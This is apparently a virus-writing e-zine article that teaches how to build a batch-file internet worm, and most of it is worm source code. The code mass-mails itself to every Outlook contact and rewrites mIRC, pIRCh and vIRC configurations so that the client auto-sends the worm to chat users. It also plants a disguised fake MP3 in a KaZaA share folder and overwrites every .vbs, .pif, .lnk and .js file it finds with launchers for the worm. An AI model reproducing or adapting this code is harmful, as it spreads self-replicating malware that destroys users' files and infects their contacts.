last article | table of contents | next article |
---|
Perfect Internet-Worm via Batch 2.0 by Second Part To Hell
In this article I'll show you some very successfull techniques for a batch internet worm. If you have any questions, contact me! 1.) eMail spreading 2.) mIRC spreading 3.) pIRCh spreading 4.) vIRC spreading 5.) KaZaA spreading 6.) VBS dropping 7.) PIF dropping 8.) LNK dropping 9.) JS dropping + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + 1.) eMail spreading First the source: * * * * * * * * * * * * * * * * * * * copy %0 C:\ATTACHMENT.bat copy %0 C:\kvqim.vbs echo Dim x > C:\kvqim.vbs echo.on error resume next >> C:\kvqim.vbs echo Set fso =" Scripting.FileSystem.Object" >> C:\kvqim.vbs echo Set so=CreateObject(fso) >> C:\kvqim.vbs echo Set ol=CreateObject("Outlook.Application") >> C:\kvqim.vbs echo Set out=WScript.CreateObject("Outlook.Application") >> C:\kvqim.vbs echo Set mapi = out.GetNameSpace("MAPI") >> C:\kvqim.vbs echo Set a = mapi.AddressLists(1) >> C:\kvqim.vbs echo Set ae=a.AddressEntries >> C:\kvqim.vbs echo For x=1 To ae.Count >> C:\kvqim.vbs echo Set ci=ol.CreateItem(0) >> C:\kvqim.vbs echo Set Mail=ci >> C:\kvqim.vbs echo Mail.to=ol.GetNameSpace("MAPI").AddressLists(1).AddressEntries(x) >> C:\kvqim.vbs echo Mail.Subject="SUBJECT" >> C:\kvqim.vbs echo Mail.Body="BODY" >> C:\kvqim.vbs echo Mail.Attachments.Add("C:\ATTACHMENT.bat") >> C:\kvqim.vbs echo Mail.Send >> C:\kvqim.vbs echo Next >> C:\kvqim.vbs echo ol.Quit >> C:\kvqim.vbs cscript C:\kvqim.vbs del C:\kvqim.vbs del C:\ATTACHMENT.bat * * * * * * * * * * * * * * * * * * * This File makes a VBS-file to send itself to all contacts in the MS-Outlook addressbook I think, it's not hard to understand... + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + 2.) mIRC spreading This virus infects the mIRC folder, if it exists. So the infected user sends viruses to every user in the chatroom! * * * * * * * * * * * * * * * * * * * copy %0 C:\pro\ATTACHMENT.bat if exist C:\mirc\script.ini set mIRC=C:\mirc if exist C:\mirc32\script.ini set mIRC=C:\mirc32 if exist C:\progra~1\mirc\script.ini set mIRC=C:\progra~1\mirc if exist C:\progra~1\mirc32\script.ini set mIRC=C:\progra~1\mirc32 copy file.bat %mIRC%\ATTACHMENT.bat echo [script] > %mIRC%\script.ini echo n0=on 1:join:*.*: { if ( $nick !=$me ) {halt} /dcc send $nick %mIRC%\ATTACHMENT.bat } >>%mIRC%\script.ini * * * * * * * * * * * * * * * * * * * The virus searches for a script.ini file in 4 standart-mIRC-paths. If it finds the file, the variable "mIRC" will be the path. Then the virus overwrites the file with this file. If any mIRC user joins to the infected users chatroom, this file will send an infect file to that user. You can use "filesend" instead of "join" in the last line, but I think, "join" is much better. + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + 3.) pIRCh spreading The source first: * * * * * * * * * * * * * * * * * * * copy %0 C:\Pirch98\ATTACHMENT.bat echo [Levels] > C:\Pirch98\events.ini echo Enabled=1 >> C:\Pirch98\events.ini echo Count=6 >> C:\Pirch98\events.ini echo Level1=000-Unknows >> C:\Pirch98\events.ini echo 000-UnknowsEnabled=1 >> C:\Pirch98\events.ini echo Level2=100-Level 100 >> C:\Pirch98\events.ini echo 100-Level 100Enabled=1 >> C:\Pirch98\events.ini echo Level3=200-Level 200 >> C:\Pirch98\events.ini echo 200-Level 200Enabled=1 >> C:\Pirch98\events.ini echo Level4=300-Level 300 >> C:\Pirch98\events.ini echo 300-Level 300Enabled=1 >> C:\Pirch98\events.ini echo Level5=400-Level 400 >> C:\Pirch98\events.ini echo 400-Level 400Enabled=1 >> C:\Pirch98\events.ini echo Level6=500-Level 500 >> C:\Pirch98\events.ini echo 500-Level 500Enabled=1 >> C:\Pirch98\events.ini echo [000-Unknowns] >> C:\Pirch98\events.ini echo User1=*!*@* >> C:\Pirch98\events.ini echo UserCount=1 >> C:\Pirch98\events.ini echo Events1= ON JOIN:#: /dcc send $nick C:\Pirch98\ATTACHMENT.bat >> C:\Pirch98\events.ini echo EventCount=1 >> C:\Pirch98\events.ini echo [100-Level 100] >> C:\Pirch98\events.ini echo UserCount=0 >> C:\Pirch98\events.ini echo EventCount=0 >> C:\Pirch98\events.ini echo [200-Level 200] >> C:\Pirch98\events.ini echo UserCount=0 >> C:\Pirch98\events.ini echo EventCount=0 >> C:\Pirch98\events.ini echo [300-Level 300] >> C:\Pirch98\events.ini echo UserCount=0 >> C:\Pirch98\events.ini echo EventCount=0 >> C:\Pirch98\events.ini echo [400-Level 400] >> C:\Pirch98\events.ini echo UserCount=0 >> C:\Pirch98\events.ini echo EventCount=0 >> C:\Pirch98\events.ini echo [500-Level 500] >> C:\Pirch98\events.ini echo UserCount=0 >> C:\Pirch98\events.ini echo EventCount=0 >> C:\Pirch98\events.ini * * * * * * * * * * * * * * * * * * * It's the same as mIRC. The virus overwrites the event.ini file, and if any user joins the infected user's chatroom, he will get an infected file. + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + 4.) vIRC spreading Source: * * * * * * * * * * * * * * * * * * * The source: copy %0 C:\Virc\ATTACHMENT.bat copy %0 xrwek.vbs echo.on error resume next >xrwek.vbs echo set ws = CreateObject("wscript.shell") >> xrwek.vbs set vircA=MeGaLiTh echo ws.regwrite "HKEY_USER\.Default\Software\MeGaLiTh Software\Visual IRC 96\Events\Event17","dcc send $nick C:\Virc\ATTACHMENT.bat " >>xrwek.vbs cscript xrwek.vbs del xrwek.vbs * * * * * * * * * * * * * * * * * * * The virus makes a vbs file, to write a new registy key! Then it sends an infected file to all users in the room, not only the users, who is joining the room. + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + 5.) KaZaA spreading Source: * * * * * * * * * * * * * * * * * * * copy %0 C:\regkey.vbs echo.on error resume next > C:\regkey.vbs echo set ws = CreateObject("wscript.shell") >> C:\regkey.vbs echo ws.regwrite "HKLM\Software\KaZaA\Transfer\DlDir0","%windir%\KaZaA\" >> C:\regkey.vbs cscript C:\regkey.vbs del C:\regkey.vbs md %windir%\KaZaA copy %MyS% %windir%\KaZaA\Nirvana - Lithium.mp3.bat * * * * * * * * * * * * * * * * * * * The virus makes a new directory, then copies itself to this dir. Then makes a Registry-Key. I think, it's also really easy. + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + 6.) VBS dropping VBS dropping means, that every .VBS file the virus can find, will be changed. If you open such a file, the file will open the virus. * * * * * * * * * * * * * * * * * * * copy %0 %windir%\yjdkt.bat copy %0 %windir%\upoby.vbs echo.on error resume next > %windir%\upoby.vbs echo dim wshs >> %windir%\upoby.vbs echo set wshs= wscript.createobject("wscript.shell") >> %windir%\upoby.vbs echo wshs.run "%windir%\yjdkt.bat" >> %windir%\upoby.vbs for %%q in (*.vbs \*.vbs ..\*.vbs %path%\*.vbs %windir%\*.vbs) do copy upoby.vbs %%q del %windir%\upoby.vbs * * * * * * * * * * * * * * * * * * * The virus makes a vbs file. If anybody opens this file, it will open the virus. Then the virus searches in the current, parent, root, path and windir directory for vbs files and copies the infected one to them. I think, it's easy but good! + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + 7.) PIF dropping The same as VBS dropping, but now the virus will infect all .PIF files * * * * * * * * * * * * * * * * * * * copy %0 %windir%\drop.vbs copy %0 %windir%\xxseu.bat echo dim wshs, msc > %windir%\drop.vbs echo set wshs=Wscript.CreateObject("WScript.Shell") >> %windir%\drop.vbs echo set msc=wshs.CreateShortcut("C:\pif.lnk") >> %windir%\drop.vbs echo msc.TargetPath = wshs.ExpandEnvironmentStrings("%windir%\xxseu.bat") >> %windir%\drop.vbs echo msc.WindowStyle = 4 >> %windir%\drop.vbs echo msc.Save >> %windir%\drop.vbs cscript %windir%\drop.vbs del %windir%\drop.vbs for %%k in (*.pif \*.pif ..\*.pif %path%\*.pif %windir%\*.pif) do copy C:\pif.pif %%k del C:\pif.pif * * * * * * * * * * * * * * * * * * * The virus makes a vbs file. This file generates a C:\pif.pif file. But why pif.pif, and not pif.lnk? The generated file opens the virus. This is a "dos"-virus, because of that it must be a .PIF file. Is it understandable??? Than the same as .VBS dropping. + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + 8.) LNK dropping What do you need for LNK droping? a windows file? But the virus is no windows file! Is it a problem? The answer is NO! What to do? You use a VBS (windows-file) file, which opens the virus. Than the same as .PIF dropping. * * * * * * * * * * * * * * * * * * * copy y.bat %windir%\dropa.vbs copy y.bat %windir%\mzxfv.bat copy y.bat %windir%\dropb.vbs echo.on error resume next >%windir%\dropb.vbs echo dim wshs >>%windir%\dropb.vbs echo set wshs=wscript.createobject("wscript.shell") >>%windir%\dropb.vbs echo wshs.run "%windir%\mzxfv.bat" >>%windir%\dropb.vbs echo dim wshs, msc > %windir%\dropa.vbs echo set wshs=Wscript.CreateObject("WScript.Shell") >> %windir%\dropa.vbs echo set msc=wshs.CreateShortcut("C:\vbs.lnk") >> %windir%\dropa.vbs echo msc.TargetPath = wshs.ExpandEnvironmentStrings("%windir%\dropb.vbs ") >> %windir%\dropa.vbs echo msc.WindowStyle = 4 >> %windir%\dropa.vbs echo msc.Save >> %windir%\dropa.vbs cscript %windir%\dropa.vbs del %windir%\dropa.vbs for %%k in (*.lnk \*.lnk ..\*.lnk %path%\*.lnk %windir%\*.lnk) do copy C:\vbs.lnk %%k * * * * * * * * * * * * * * * * * * * I think, you will understand it!!! + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + 9.) JS dropping It's the same as VBS-dropping: * * * * * * * * * * * * * * * * * * * copy %0 %windir%\uatvs.bat echo { >> %windir%\snphh.js echo shell=WScript.CreateObject("WScript.Shell"; >> %windir%\snphh.js echo shell.Run("%windir%\uatvs.bat"); >> %windir%\snphh.js echo } >> %windir%\snphh.js for %%j in (*.js \*.js ..\*.js %path%\*.js %windir%\*.js) do copy snphh.js %%j del %windir%\snphh.js * * * * * * * * * * * * * * * * * * * First copy the file to the windows-dir. Then make a JS-file, that opens the virus in the windows-directory. Then copy the JS-file to every existing JS-file OK, it's easy... + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + I hope, you understood all the source and i could help you! greets, SeCoNd PaRt To HeLl www.spth.de.vu